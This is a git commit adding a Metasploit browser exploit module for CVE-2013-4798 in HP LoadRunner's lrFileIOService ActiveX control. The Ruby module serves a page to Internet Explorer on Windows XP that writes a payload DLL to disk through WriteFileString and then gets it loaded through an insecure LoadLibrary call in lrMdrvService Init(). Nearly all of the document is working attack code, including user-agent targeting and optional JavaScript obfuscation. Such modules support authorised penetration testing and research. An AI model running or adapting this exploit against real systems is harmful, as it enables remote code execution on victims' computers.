Land rapid7#2305 - HP LoadRunner lrFileIOService ActiveX WriteFileString Bug

wchen-r7 · wchen-r7 · commit 7401f83d8e28 · 2013-08-30T03:23:47.000-05:00
diff --git a/modules/exploits/windows/browser/hp_loadrunner_writefilestring.rb b/modules/exploits/windows/browser/hp_loadrunner_writefilestring.rb
@@ -0,0 +1,152 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+#   http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = NormalRanking
+
+	include Msf::Exploit::Remote::HttpServer::HTML
+	include Msf::Exploit::Remote::BrowserAutopwn
+	include Msf::Exploit::EXE
+
+	autopwn_info({
+		:ua_name    => HttpClients::IE,
+		:ua_minver  => "6.0",
+		:ua_maxver  => "8.0",
+		:javascript => true,
+		:os_name    => OperatingSystems::WINDOWS,
+		:os_ver     => OperatingSystems::WindowsVersions::XP,
+		:rank       => NormalRanking,
+		:classid    => "{8D9E2CC7-D94B-4977-8510-FB49C361A139}",
+		:method     => "WriteFileString "
+	})
+
+	def initialize(info={})
+		super(update_info(info,
+			'Name'           => "HP LoadRunner lrFileIOService ActiveX WriteFileString Remote Code Execution",
+			'Description'    => %q{
+				This module exploits a vulnerability on the lrFileIOService ActiveX, as installed
+				with HP LoadRunner 11.50. The vulnerability exists in the WriteFileString method,
+				which allow the user to write arbitrary files. It's abused to drop a payload
+				embedded in a dll, which is later loaded through the Init() method from the
+				lrMdrvService control, by abusing an insecure LoadLibrary call. This module has
+				been tested successfully on IE8 on Windows XP. Virtualization based on the Low
+				Integrity Process, on Windows Vista and 7, will stop this module because the DLL
+				will be dropped to a virtualized folder, which isn't used by LoadLibrary.
+			},
+			'License'        => MSF_LICENSE,
+			'Author'         =>
+				[
+					'Brian Gorenc', # Vulnerability discovery
+					'juan vazquez'  # Metasploit module
+				],
+			'References'     =>
+				[
+					[ 'CVE', '2013-4798' ],
+					[ 'OSVDB', '95642' ],
+					[ 'BID', '61443'],
+					[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-207/' ],
+					[ 'URL', 'https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03862772' ]
+				],
+			'Payload'		=>
+				{
+					'Space'	      => 2048,
+					'DisableNops' => true
+				},
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+					[ 'Automatic IE on Windows XP', {} ]
+				],
+			'Privileged'     => false,
+			'DisclosureDate' => "Jul 24 2013",
+			'DefaultTarget'  => 0))
+
+		register_options(
+			[
+				OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
+			], self.class)
+
+	end
+
+	# Just reminding the user to delete LrWeb2MdrvLoader.dll
+	# because migration and killing the exploited process is
+	# needed
+	def on_new_session(session)
+		print_status("New session... remember to delete LrWeb2MdrvLoader.dll")
+	end
+
+	def is_target?(agent)
+		if agent =~ /Windows NT 5\.1/ and agent =~ /MSIE/
+			return true
+		end
+
+		return false
+	end
+
+	def create_dll_js(object_id, dll_data)
+		dll_js = ""
+		first = true
+		dll_data.each_char { |chunk|
+			if first
+				dll_js << "#{object_id}.WriteFileString(\"LrWeb2MdrvLoader.dll\", unescape(\"%u01#{Rex::Text.to_hex(chunk, "")}\"), false, \"UTF-8\");\n"
+				first = false
+			else
+				dll_js << "#{object_id}.WriteFileString(\"LrWeb2MdrvLoader.dll\", unescape(\"%u01#{Rex::Text.to_hex(chunk, "")}\"), true, \"UTF-8\");\n"
+			end
+		}
+		return dll_js
+	end
+
+	def load_exploit_html(cli)
+		return nil if ((p = regenerate_payload(cli)) == nil)
+
+		file_io = rand_text_alpha(rand(10) + 8)
+		mdrv_service = rand_text_alpha(rand(10) + 8)
+		dll_data = generate_payload_dll({ :code => p.encoded })
+		drop_dll_js = create_dll_js(file_io, dll_data)
+
+		html = %Q|
+		<html>
+		<body>
+		<object classid='clsid:8D9E2CC7-D94B-4977-8510-FB49C361A139' id='#{file_io}'></object>
+		<object classid='clsid:9EE336F8-04B7-4B9F-8421-B982E7A4785C' id='#{mdrv_service}'></object>
+		<script language='javascript'>
+		#{drop_dll_js}
+		#{mdrv_service}.Init("-f #{rand_text_alpha(8 + rand(8))}", "#{rand_text_alpha(8 + rand(8))}");
+		</script>
+		</body>
+		</html>
+		|
+
+		return html
+	end
+
+	def on_request_uri(cli, request)
+		agent = request.headers['User-Agent']
+		uri   = request.uri
+		print_status("Requesting: #{uri}")
+
+		# Avoid the attack if no suitable target found
+		if not is_target?(agent)
+			print_error("Browser not supported, sending 404: #{agent}")
+			send_not_found(cli)
+			return
+		end
+
+		html = load_exploit_html(cli)
+		if html.nil?
+			send_not_found(cli)
+			return
+		end
+		html = html.gsub(/^\t\t/, '')
+		print_status("Sending HTML...")
+		send_response(cli, html, {'Content-Type'=>'text/html'})
+	end
+
+end
